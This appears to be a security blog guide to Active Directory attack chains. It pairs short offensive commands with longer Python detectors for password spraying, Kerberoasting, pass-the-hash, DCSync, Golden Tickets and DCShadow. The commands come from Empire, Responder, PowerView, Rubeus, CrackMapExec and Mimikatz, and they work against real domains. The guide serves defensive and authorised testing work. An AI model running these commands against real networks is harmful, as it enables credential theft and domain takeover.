Active Directory Attack Chains: Small Guide to Infrastructure Penetration Testing
Active Directory (AD) remains the backbone of enterprise networks, which makes it a prime target for attackers and a priority for defenders. In this guide we walk through the attack chains most often used to compromise Active Directory environments, along with the detection and prevention strategies that counter each stage.
Understanding Active Directory Attack Surface
Before diving into attack chains, it is important to understand the Active Directory attack surface. Active Directory is a hierarchical directory that manages network resources, user authentication, and access control. Its size and complexity mean that misconfigurations accumulate over time, and those misconfigurations are what most attack chains exploit.
Common Entry Points
Active Directory environments typically expose multiple entry points that attackers can leverage:
- Network Service Exposure: Services like LDAP, Kerberos, and SMB are essential for AD operations but can be exploited if not properly secured.
- Misconfigurations: Default settings, weak GPOs, and improper access controls often create security gaps.
- Legacy Protocols: Older authentication protocols like NTLM can be exploited through various attack techniques.
Initial Access Techniques
Password Spraying
Password spraying remains one of the most effective initial access techniques. Unlike brute force attacks, password spraying uses a few common passwords against many accounts to avoid account lockouts.
Example Attack:
```powershell
# Using PowerShell Empire for password spraying
Invoke-DomainPasswordSpray -Password "Spring2023!" -UserList users.txt
```
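The defensive counterpart to the spray above is a detector that keys on breadth rather than depth: one source failing logons for many distinct accounts inside a short window. The following is an added example for this post, not code from the original article or any tool it names; the 4625/4624 records are constructed sample data and the IPs and account names are hypothetical.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of Security log 4625 (logon failure) and 4624 (logon success)
# records, reduced to the fields the detector needs. Not real log data.
SAMPLE_EVENTS = [
    # One host tries a single password against twelve accounts in twelve seconds.
    *[{"time": f"2024-11-03T09:00:{i:02d}", "event_id": 4625,
       "user": f"user{i:02d}", "src_ip": "10.0.0.50"} for i in range(1, 13)],
    # A normal user mistyping their own password three times, then succeeding.
    {"time": "2024-11-03T09:05:00", "event_id": 4625, "user": "alice", "src_ip": "10.0.0.21"},
    {"time": "2024-11-03T09:05:10", "event_id": 4625, "user": "alice", "src_ip": "10.0.0.21"},
    {"time": "2024-11-03T09:05:25", "event_id": 4625, "user": "alice", "src_ip": "10.0.0.21"},
    {"time": "2024-11-03T09:06:00", "event_id": 4624, "user": "alice", "src_ip": "10.0.0.21"},
]


def detect_password_spray(events, min_accounts=10, window=timedelta(minutes=5)):
    """Return one alert per source IP whose failed logons cover at least
    `min_accounts` distinct accounts within any `window`-long span.

    A brute force against a single account never trips this rule, because the
    signal is the number of accounts touched, not the number of attempts."""
    failures = sorted((e for e in events if e["event_id"] == 4625), key=lambda e: e["time"])
    per_source = defaultdict(list)
    for e in failures:
        per_source[e["src_ip"]].append(e)

    alerts = []
    for src_ip, evs in per_source.items():
        recent = deque()          # (timestamp, user) pairs inside the sliding window
        best, best_span = 0, None
        for e in evs:
            t = datetime.fromisoformat(e["time"])
            recent.append((t, e["user"]))
            while t - recent[0][0] > window:   # drop failures older than the window
                recent.popleft()
            distinct = len({u for _, u in recent})
            if distinct > best:
                best, best_span = distinct, (recent[0][0].isoformat(), t.isoformat())
        if best >= min_accounts:
            alerts.append({"src_ip": src_ip, "distinct_accounts": best,
                           "window_start": best_span[0], "window_end": best_span[1]})
    return alerts


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_EVENTS):
        print(alert)
```

In production the same rule should also consume Kerberos pre-authentication failures (event 4771) from every domain controller, since a spray aimed at the KDC never produces 4625 on the targeted hosts, and the threshold should sit below the domain lockout threshold multiplied by the number of accounts an attacker could plausibly enumerate.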
LLMNR/NBT-NS Poisoning
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) poisoning can be used to capture NetNTLM hashes:
```shell
# Using Responder to capture hashes
sudo responder -I eth0 -wrfv
```
Privilege Escalation Paths
Kerberoasting
Kerberoasting requests service tickets (TGS) for accounts that have SPNs. Each ticket is encrypted with the service account's password hash, so it can be cracked offline without touching the domain again:
```powershell
# Using PowerView for Kerberoasting
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat
```
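On the domain controllers, the request above shows up as a burst of event 4769 entries with an RC4 ticket encryption type (0x17) for several service accounts from one user. The detector below is an added example written for this post, not code from the original article or from PowerView; the 4769 records are constructed sample data and every account, service and address in them is hypothetical.

```python
from collections import defaultdict

# Constructed sample of event 4769 (Kerberos service ticket requested) records.
# enc_type 0x17 is RC4-HMAC, 0x12 is AES256-CTS-HMAC-SHA1-96; status 0x0 means
# the ticket was issued. Not real log data.
SAMPLE_4769 = [
    {"event_id": 4769, "account": "bob@CONTOSO.LOCAL", "service": "svc_sql",    "enc_type": "0x17", "status": "0x0", "client_ip": "10.0.0.77"},
    {"event_id": 4769, "account": "bob@CONTOSO.LOCAL", "service": "svc_web",    "enc_type": "0x17", "status": "0x0", "client_ip": "10.0.0.77"},
    {"event_id": 4769, "account": "bob@CONTOSO.LOCAL", "service": "svc_backup", "enc_type": "0x17", "status": "0x0", "client_ip": "10.0.0.77"},
    {"event_id": 4769, "account": "bob@CONTOSO.LOCAL", "service": "svc_ftp",    "enc_type": "0x17", "status": "0x0", "client_ip": "10.0.0.77"},
    # Failed request (status 0x6, principal unknown): no ticket was issued, so nothing to crack.
    {"event_id": 4769, "account": "bob@CONTOSO.LOCAL", "service": "svc_legacy", "enc_type": "0x17", "status": "0x6", "client_ip": "10.0.0.77"},
    # Ordinary user activity: AES tickets for a file server, the KDC itself and one SQL service.
    {"event_id": 4769, "account": "alice@CONTOSO.LOCAL", "service": "fs01$",   "enc_type": "0x12", "status": "0x0", "client_ip": "10.0.0.21"},
    {"event_id": 4769, "account": "alice@CONTOSO.LOCAL", "service": "krbtgt",  "enc_type": "0x12", "status": "0x0", "client_ip": "10.0.0.21"},
    {"event_id": 4769, "account": "alice@CONTOSO.LOCAL", "service": "svc_sql", "enc_type": "0x12", "status": "0x0", "client_ip": "10.0.0.21"},
]

RC4_HMAC = "0x17"


def kerberoast_candidates(events, min_services=3):
    """Map each requesting account to the distinct service accounts for which it
    obtained RC4-encrypted service tickets, keeping only requesters that reached
    `min_services`. One principal pulling RC4 tickets for many service accounts
    in a short period is the classic Kerberoasting footprint."""
    by_account = defaultdict(set)
    for e in events:
        if e["event_id"] != 4769 or e["status"] != "0x0":
            continue
        service = e["service"]
        # Machine accounts carry long random passwords and krbtgt is the TGT
        # service itself, so neither is a realistic offline-cracking target.
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        if e["enc_type"].lower() != RC4_HMAC:
            continue
        by_account[e["account"]].add(service)
    return {acct: sorted(svcs) for acct, svcs in by_account.items() if len(svcs) >= min_services}


if __name__ == "__main__":
    print(kerberoast_candidates(SAMPLE_4769))
```

The RC4 filter is what keeps the rule quiet: once service accounts are configured for AES-only Kerberos keys (and have passwords long enough that cracking is impractical), any remaining 0x17 request is itself worth a look, because a modern client only downgrades to RC4 when it is asked to.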
AS-REP Roasting
This technique targets users with “Do not require Kerberos preauthentication” enabled:
```powershell
# Using Rubeus for AS-REP Roasting
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
```
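The setting Rubeus looks for is a single bit in the userAccountControl attribute, so the cheapest defence is to audit that attribute yourself before anyone else does. The script below is an added example for this post, not code from the original article or from Rubeus: it decodes the userAccountControl bits and flags the combinations that matter for the techniques in this section (pre-authentication disabled, no password required, and SPN-bearing accounts whose password never expires). The directory export it runs over is constructed sample data with hypothetical account names.

```python
# userAccountControl bit flags (subset) as documented for Active Directory,
# listed in ascending bit order so decode_uac returns them in a stable order.
UAC_FLAGS = [
    (0x0002, "ACCOUNTDISABLE"),
    (0x0020, "PASSWD_NOTREQD"),
    (0x0200, "NORMAL_ACCOUNT"),
    (0x10000, "DONT_EXPIRE_PASSWORD"),
    (0x80000, "TRUSTED_FOR_DELEGATION"),
    (0x200000, "USE_DES_KEY_ONLY"),
    (0x400000, "DONT_REQ_PREAUTH"),
    (0x1000000, "TRUSTED_TO_AUTH_FOR_DELEGATION"),
]

# Flags that on their own make an enabled account a target.
RISKY_FLAGS = {
    "DONT_REQ_PREAUTH": "AS-REP roastable: an AS-REP can be obtained without the password",
    "PASSWD_NOTREQD": "directory permits an empty password",
    "USE_DES_KEY_ONLY": "DES-only Kerberos keys",
    "TRUSTED_FOR_DELEGATION": "unconstrained delegation: caches TGTs of connecting users",
}

# Constructed directory export (not real accounts). Values are the raw attribute.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "alice",          "userAccountControl": 0x200,    "servicePrincipalName": []},
    {"sAMAccountName": "svc_legacy",     "userAccountControl": 0x400200, "servicePrincipalName": []},
    {"sAMAccountName": "svc_sql",        "userAccountControl": 0x10200,  "servicePrincipalName": ["MSSQLSvc/sql01.contoso.local:1433"]},
    {"sAMAccountName": "old_contractor", "userAccountControl": 0x400202, "servicePrincipalName": []},
]


def decode_uac(value):
    """Translate a userAccountControl integer into the names of the set flags."""
    return [name for bit, name in UAC_FLAGS if value & bit]


def audit_accounts(accounts):
    """Return {sAMAccountName: [finding, ...]} for enabled accounts whose flags
    expose them to AS-REP roasting, Kerberoasting or related abuse."""
    findings = {}
    for acct in accounts:
        flags = decode_uac(acct["userAccountControl"])
        if "ACCOUNTDISABLE" in flags:
            continue  # cannot authenticate; clean up separately rather than alert
        issues = [f"{flag}: {why}" for flag, why in RISKY_FLAGS.items() if flag in flags]
        if acct["servicePrincipalName"] and "DONT_EXPIRE_PASSWORD" in flags:
            issues.append("SPN with non-expiring password: Kerberoastable and the hash never rotates")
        if issues:
            findings[acct["sAMAccountName"]] = issues
    return findings


if __name__ == "__main__":
    for name, issues in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(name, issues)
```

Feed it the output of an LDAP query for `userAccountControl` and `servicePrincipalName` and run it on a schedule; a new DONT_REQ_PREAUTH account appearing between two runs is a finding in its own right, since almost nothing legitimately needs that bit.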
Lateral Movement Techniques
Pass-the-Hash
Once you’ve obtained NTLM hashes, you can use them for lateral movement without knowing the actual password:
```shell
# Using CrackMapExec for Pass-the-Hash
crackmapexec smb 192.168.1.0/24 -u administrator -H "<NTLM hash>"
```
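A sweep like the one above leaves a distinctive trail on the targets: successful network logons (event 4624, logon type 3) authenticated with NTLM rather than Kerberos, for the same account, from the same source, across many hosts in a short time. The following is an added example written for this post, not code from the original article or from CrackMapExec; the 4624 records are constructed and all hosts, accounts and addresses are hypothetical.

```python
from collections import defaultdict

# Constructed sample of event 4624 (successful logon) records from several hosts,
# reduced to the fields used here. Logon type 3 is a network logon; auth_package
# is the Authentication Package field. Not real log data.
SAMPLE_4624 = [
    # One account authenticating with NTLM from one source to four different hosts.
    {"event_id": 4624, "account": "administrator", "logon_type": 3, "auth_package": "NTLM", "src_ip": "10.0.0.77", "target_host": "ws01"},
    {"event_id": 4624, "account": "administrator", "logon_type": 3, "auth_package": "NTLM", "src_ip": "10.0.0.77", "target_host": "ws02"},
    {"event_id": 4624, "account": "administrator", "logon_type": 3, "auth_package": "NTLM", "src_ip": "10.0.0.77", "target_host": "ws03"},
    {"event_id": 4624, "account": "administrator", "logon_type": 3, "auth_package": "NTLM", "src_ip": "10.0.0.77", "target_host": "fs01"},
    # A domain user reaching several hosts the normal way, with Kerberos.
    {"event_id": 4624, "account": "alice", "logon_type": 3, "auth_package": "Kerberos", "src_ip": "10.0.0.21", "target_host": "fs01"},
    {"event_id": 4624, "account": "alice", "logon_type": 3, "auth_package": "Kerberos", "src_ip": "10.0.0.21", "target_host": "ws01"},
    {"event_id": 4624, "account": "alice", "logon_type": 3, "auth_package": "Kerberos", "src_ip": "10.0.0.21", "target_host": "ws02"},
    # Machine account NTLM traffic and an interactive console logon, both ignored.
    {"event_id": 4624, "account": "ws05$", "logon_type": 3, "auth_package": "NTLM", "src_ip": "10.0.0.105", "target_host": "dc01"},
    {"event_id": 4624, "account": "administrator", "logon_type": 2, "auth_package": "Negotiate", "src_ip": "-", "target_host": "dc01"},
]


def detect_ntlm_fanout(events, min_hosts=3):
    """Return (account, source) pairs that completed NTLM network logons to at
    least `min_hosts` distinct hosts. In a Kerberos domain, a human user logging
    on by NTLM to many machines from one source is the pass-the-hash shape:
    the attacker holds the hash, so NTLM is the only protocol they can speak."""
    by_key = defaultdict(set)
    for e in events:
        if e["event_id"] != 4624 or e["logon_type"] != 3:
            continue
        if e["auth_package"].upper() != "NTLM":
            continue
        if e["account"].endswith("$"):
            continue  # machine accounts still use NTLM for some services; tune separately
        by_key[(e["account"], e["src_ip"])].add(e["target_host"])
    return [{"account": acct, "src_ip": src, "hosts": sorted(hosts)}
            for (acct, src), hosts in sorted(by_key.items()) if len(hosts) >= min_hosts]


if __name__ == "__main__":
    for alert in detect_ntlm_fanout(SAMPLE_4624):
        print(alert)
```

The rule only works if 4624 is collected from workstations and member servers, not just domain controllers, because pass-the-hash against SMB on a member host is authenticated by that host. Restricting local administrator accounts from network logon (and randomising their passwords with LAPS, as recommended further down) removes most of what this rule would otherwise catch.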
Token Impersonation
Impersonating the access tokens of other users logged on to a compromised host, for privilege escalation and lateral movement:
```text
# Using Mimikatz for token impersonation
privilege::debug
token::elevate /user:DOMAIN\Administrator
```
Domain Dominance
DCSync Attack
Once sufficient privileges are obtained, DCSync can be used to retrieve password hashes for any domain user:
```text
# Using Mimikatz for DCSync
lsadump::dcsync /domain:contoso.local /user:Administrator
```
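DCSync works by asking a domain controller to replicate, using the same directory replication rights a real DC has. With "Audit Directory Service Access" enabled, each replication request is recorded as event 4662 whose Properties field lists the control-access-right GUIDs exercised, so the detection is to alert whenever those GUIDs appear for a principal that is not a known domain controller or an approved synchronisation account. The code below is an added example for this post, not from the original article or from Mimikatz; the replication-right GUIDs are the standard Active Directory values, while the 4662 records, the accounts and the placeholder GUID in the last record are constructed.

```python
# Control-access-right GUIDs that appear in the Properties field of event 4662
# when a principal performs directory replication. These are the standard AD values.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

REPL_PROPS = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"

# Constructed sample of event 4662 records from a domain controller. Not real log data.
SAMPLE_4662 = [
    {"event_id": 4662, "subject": "CONTOSO\\DC02$", "object_type": "domainDNS", "properties": REPL_PROPS},
    # Hypothetical directory-synchronisation service account that legitimately replicates.
    {"event_id": 4662, "subject": "CONTOSO\\MSOL_4f3a21b9", "object_type": "domainDNS", "properties": REPL_PROPS},
    # A regular user exercising replication rights: this is what DCSync looks like.
    {"event_id": 4662, "subject": "CONTOSO\\bob", "object_type": "domainDNS", "properties": REPL_PROPS},
    # An ordinary attribute read; the GUID is a constructed placeholder, not a real right.
    {"event_id": 4662, "subject": "CONTOSO\\alice", "object_type": "user", "properties": "{00000000-0000-0000-0000-0000deadbeef}"},
]


def detect_dcsync(events, domain_controllers=(), allowed_accounts=()):
    """Return one alert per 4662 event in which a principal outside the explicit
    domain-controller and allow lists exercised a replication right.

    The DC list is explicit rather than "anything ending in $" because an
    attacker holding any machine account would otherwise pass the filter."""
    dcs = {d.lower() for d in domain_controllers}
    allowed = {a.lower() for a in allowed_accounts}
    alerts = []
    for e in events:
        if e["event_id"] != 4662:
            continue
        subject = e["subject"].lower()
        if subject in dcs or subject in allowed:
            continue
        props = e["properties"].lower()
        rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
        if rights:
            alerts.append({"subject": e["subject"], "object_type": e["object_type"], "rights": rights})
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_4662, domain_controllers=["CONTOSO\\DC02$"],
                               allowed_accounts=["CONTOSO\\MSOL_4f3a21b9"]):
        print(alert)
```

The allow lists are the maintenance burden: every new domain controller and every product that syncs the directory must be added, and an account appearing on the allow list that does not need replication rights is a finding for the hardening section rather than the SOC. Reviewing who actually holds these rights on the domain object (they should be the DCs, and little else) is the prevention half of the same control.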
Golden Ticket Attack
A Golden Ticket is a TGT forged with the krbtgt account's hash rather than issued by a domain controller, and it provides persistent domain admin access:
```text
# Using Mimikatz to create Golden Ticket
kerberos::golden /domain:contoso.local /sid:S-1-5-21-... /krbtgt:<hash> /user:fakeadmin
```
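Because a forged TGT is never issued by a KDC, the domain controllers have no 4768 (TGT requested) for it, yet they do log a 4769 each time the ticket is presented for a service ticket. Two checks follow from that: a service-ticket request for an account with no recent TGT request, and a request for an account that does not exist in the directory at all (the "fakeadmin" in the command above would fail both). The correlation below is an added example for this post, not code from the original article or from Mimikatz; the Kerberos events and account names are constructed.

```python
from datetime import datetime, timedelta

# Constructed Kerberos audit events from the domain controllers: 4768 = TGT requested,
# 4769 = service ticket requested. Not real log data.
SAMPLE_KRB = [
    {"time": "2024-11-03T08:00:00", "event_id": 4768, "account": "alice", "client_ip": "10.0.0.21"},
    {"time": "2024-11-03T08:01:00", "event_id": 4769, "account": "alice", "service": "cifs/fs01", "client_ip": "10.0.0.21"},
    # Service ticket for an account that has neither a TGT request nor a directory object.
    {"time": "2024-11-03T10:30:00", "event_id": 4769, "account": "fakeadmin", "service": "cifs/dc01", "client_ip": "10.0.0.77"},
    # Real account, but no TGT request was ever logged for it.
    {"time": "2024-11-03T10:31:00", "event_id": 4769, "account": "bob", "service": "ldap/dc01", "client_ip": "10.0.0.77"},
]

# Constructed snapshot of the directory's user accounts.
KNOWN_ACCOUNTS = {"alice", "bob", "administrator"}


def detect_tgs_without_tgt(events, known_accounts, max_tgt_age=timedelta(hours=10)):
    """Flag 4769 events whose account has no 4768 within `max_tgt_age` (the default
    TGT lifetime) or does not exist in the directory. Events must come from every
    DC in the domain, since the TGT may have been issued by a different KDC."""
    known = {a.lower() for a in known_accounts}
    last_tgt = {}
    alerts = []
    for e in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(e["time"])
        acct = e["account"].lower()
        if e["event_id"] == 4768:
            last_tgt[acct] = t
        elif e["event_id"] == 4769:
            reasons = []
            if acct not in known:
                reasons.append("account does not exist in the directory")
            issued = last_tgt.get(acct)
            if issued is None or t - issued > max_tgt_age:
                reasons.append("no TGT request (4768) within the ticket lifetime")
            if reasons:
                alerts.append({"time": e["time"], "account": e["account"],
                               "service": e["service"], "client_ip": e["client_ip"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_tgs_without_tgt(SAMPLE_KRB, KNOWN_ACCOUNTS):
        print(alert)
```

The rule needs log retention longer than the TGT lifetime to avoid false positives after a restart of the collector, and it does nothing about a forged ticket for a real account whose genuine TGT was requested recently. That is why the durable response to a suspected Golden Ticket is to reset the krbtgt password twice (with replication in between), which invalidates every ticket signed with the old hash.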
Detection and Prevention Strategies
Event Log Monitoring
Implement comprehensive logging and monitoring:
- Enable Advanced Audit Policy Configuration
- Monitor for suspicious authentication patterns
- Track privileged group membership changes
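The third bullet is the one most often left as a manual review, so here is what it looks like as a rule. Membership changes to built-in privileged groups are logged as 4728/4732/4756 (member added to a global, local or universal group) and 4729/4733/4757 (member removed); the detector filters those to a list of privileged groups and rates the change by whether the operator is on the approved list. This is an added example for this post, not from the original article; the events, operators and group members are constructed.

```python
# Built-in groups whose membership grants domain or DC-level control.
PRIVILEGED_GROUPS = {
    "domain admins", "enterprise admins", "schema admins", "administrators",
    "account operators", "backup operators", "server operators", "print operators",
    "dnsadmins", "group policy creator owners",
}

# Security event IDs for group membership changes, by group scope.
MEMBERSHIP_EVENTS = {
    4728: "added to global group", 4732: "added to local group", 4756: "added to universal group",
    4729: "removed from global group", 4733: "removed from local group", 4757: "removed from universal group",
}

# Constructed sample of membership-change events. Not real log data.
SAMPLE_GROUP_EVENTS = [
    {"time": "2024-11-03T10:00:00", "event_id": 4728, "subject": "CONTOSO\\itadmin1",
     "member": "CN=Bob Jones,OU=IT,DC=contoso,DC=local", "group": "Domain Admins"},
    {"time": "2024-11-03T10:05:00", "event_id": 4728, "subject": "CONTOSO\\itadmin1",
     "member": "CN=Carol Diaz,OU=Sales,DC=contoso,DC=local", "group": "Sales"},
    # A service account adding an unknown user to Administrators at 02:13, then
    # removing the monitoring account from Domain Admins.
    {"time": "2024-11-03T02:13:00", "event_id": 4732, "subject": "CONTOSO\\svc_web",
     "member": "CN=fakeadmin,CN=Users,DC=contoso,DC=local", "group": "Administrators"},
    {"time": "2024-11-03T02:14:00", "event_id": 4729, "subject": "CONTOSO\\svc_web",
     "member": "CN=SOC Monitor,OU=IT,DC=contoso,DC=local", "group": "Domain Admins"},
]


def review_group_changes(events, approved_operators):
    """Return every membership change to a privileged group. Changes made by an
    operator on the approved list are rated "info" (still recorded, so the trail
    exists); anyone else is "high". Removals are included because an attacker who
    evicts the defenders' accounts is as interesting as one who adds their own."""
    approved = {a.lower() for a in approved_operators}
    alerts = []
    for e in events:
        action = MEMBERSHIP_EVENTS.get(e["event_id"])
        if action is None or e["group"].lower() not in PRIVILEGED_GROUPS:
            continue
        severity = "info" if e["subject"].lower() in approved else "high"
        alerts.append({"time": e["time"], "severity": severity, "operator": e["subject"],
                       "action": action, "member": e["member"], "group": e["group"]})
    return alerts


if __name__ == "__main__":
    for alert in review_group_changes(SAMPLE_GROUP_EVENTS, approved_operators=["CONTOSO\\itadmin1"]):
        print(alert)
```

Pair this with a periodic diff of the groups' actual membership against an approved baseline: membership can also change through SID history, nested groups and primaryGroupID, none of which produce these events.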
Network Segmentation
Implement proper network segmentation:
- Separate different security tiers
- Restrict lateral movement paths
- Implement PAW (Privileged Access Workstation) solutions
Security Hardening
Implement these critical security measures:
- Regular password policy enforcement
- Disable legacy protocols where possible
- Implement LAPS (Local Administrator Password Solution)
- Enable PAM (Privileged Access Management)
Advanced Persistence Techniques
DCShadow
DCShadow allows attackers to register a rogue domain controller and push attribute changes into the directory through normal replication, bypassing the object-level auditing a write through LDAP would trigger:
```text
# Using Mimikatz for DCShadow
lsadump::dcshadow /object:victim /attribute:userAccountControl /value:0x200
```
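The replicated change itself is hard to see, but registering the rogue DC is not: the attacker's machine account must receive the SPNs a real DC carries (a GC/ SPN and one prefixed with the DRS replication interface GUID), which appears as event 4742 (computer account changed), and a server object must be created under CN=Sites in the Configuration partition, which appears as event 5137. Both happen on a host that is not on the list of real domain controllers. The detector below is an added example for this post, not from the original article or from Mimikatz; the DRS interface GUID is the standard value, while the events, host names and the GUID inside the sample SPN are constructed placeholders.

```python
# Interface GUID of the Directory Replication Service RPC endpoint; a DC carries an
# SPN of the form <this GUID>/<DSA GUID>/<domain>. This is the standard AD value.
DRS_INTERFACE_GUID = "e3514235-4b06-11d1-ab04-00c04fc2dcd2"

# Constructed sample events. The DSA GUID inside the SPN is a placeholder. Not real log data.
SAMPLE_DCSHADOW = [
    # A workstation account that suddenly carries DC-only SPNs.
    {"event_id": 4742, "computer": "WS07$", "subject": "CONTOSO\\bob",
     "spns": ["HOST/ws07.contoso.local",
              "GC/ws07.contoso.local/contoso.local",
              "E3514235-4B06-11D1-AB04-00C04FC2DCD2/00000000-0000-0000-0000-000000000000/contoso.local"]},
    # A real DC whose SPNs were updated normally.
    {"event_id": 4742, "computer": "DC01$", "subject": "NT AUTHORITY\\SYSTEM",
     "spns": ["GC/dc01.contoso.local/contoso.local", "ldap/dc01.contoso.local"]},
    # A server object created under the site for that same workstation.
    {"event_id": 5137, "subject": "CONTOSO\\bob", "object_class": "server",
     "object_dn": "CN=WS07,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=contoso,DC=local"},
    # An ordinary SPN change on another workstation.
    {"event_id": 4742, "computer": "WS08$", "subject": "NT AUTHORITY\\SYSTEM",
     "spns": ["HOST/ws08.contoso.local", "TERMSRV/ws08.contoso.local"]},
]


def detect_dcshadow(events, domain_controllers):
    """Flag the two registration artefacts of a rogue DC on any host outside the
    explicit domain-controller list: DC-only SPNs set on its computer account (4742)
    and a server object created in the Sites container (5137)."""
    dcs = {d.lower() for d in domain_controllers}
    alerts = []
    for e in events:
        if e["event_id"] == 4742 and e["computer"].lower() not in dcs:
            suspicious = [s for s in e["spns"]
                          if s.upper().startswith("GC/") or s.lower().startswith(DRS_INTERFACE_GUID)]
            if suspicious:
                alerts.append({"computer": e["computer"], "subject": e["subject"],
                               "reason": "DC-only SPNs on a non-DC computer account", "spns": suspicious})
        elif (e["event_id"] == 5137 and e["object_class"].lower() == "server"
              and ",cn=sites,cn=configuration," in e["object_dn"].lower()):
            # RDN "CN=WS07" -> computer account name "WS07$"
            name = e["object_dn"].split(",")[0][3:] + "$"
            if name.lower() not in dcs:
                alerts.append({"computer": name, "subject": e["subject"],
                               "reason": "server object created under CN=Sites", "dn": e["object_dn"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_dcshadow(SAMPLE_DCSHADOW, domain_controllers=["DC01$", "DC02$"]):
        print(alert)
```

Both events are on by default only if "Audit Computer Account Management" and "Audit Directory Service Changes" are enabled and a SACL exists on the Sites container, which is one concrete reason to enable the Advanced Audit Policy Configuration mentioned in the detection section. The attacker typically removes the SPNs and the server object again within seconds, so the rule must fire on the creation event rather than on current state.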
Conclusion
Active Directory attack chains are complex but follow logical progression paths. Understanding these attack chains is crucial for both offensive security testing and defensive measures. Regular security assessments, proper monitoring, and implementing defense-in-depth strategies are essential for protecting Active Directory environments.
Remember that these techniques should only be used in authorized penetration testing engagements with proper documentation and approval.
Additional Resources
- Microsoft Security Best Practices for Active Directory
- MITRE ATT&CK Framework - Active Directory Tactics
- Active Directory Security Blog
- PowerShell Empire Documentation
- Impacket Tools Documentation
Last updated 03 Nov 2024, 18:05 +0530.